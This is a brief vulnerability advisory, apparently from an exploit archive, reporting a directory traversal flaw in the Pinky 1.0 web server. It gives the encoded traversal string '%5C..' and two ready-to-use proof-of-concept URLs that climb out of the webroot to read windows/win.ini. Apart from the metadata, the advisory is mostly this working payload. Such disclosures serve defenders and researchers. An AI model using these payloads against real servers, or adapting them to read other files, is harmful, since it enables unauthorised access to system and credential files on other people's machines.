Pinky version 1.0 suffers from a directory traversal vulnerability.
f4301e3f0c77af9895ea0db04d02f7607669dc1b77a47c87f62c171b179b1fb1
------------------------------------------------------------------------
Software................Pinky 1.0
Vulnerability...........Directory Traversal
Download................http://www.yellosoft.us/pinky
Release Date............9/16/2010
Tested On...............Windows XP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://www.johnleitch.net/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------
--Description--
A directory traversal vulnerability in Pinky 1.0 can be exploited to
read files outside of the webroot directory.
--Exploit--
%5C..
--PoC--
http://localhost/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini
http://localhost/%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows/win.ini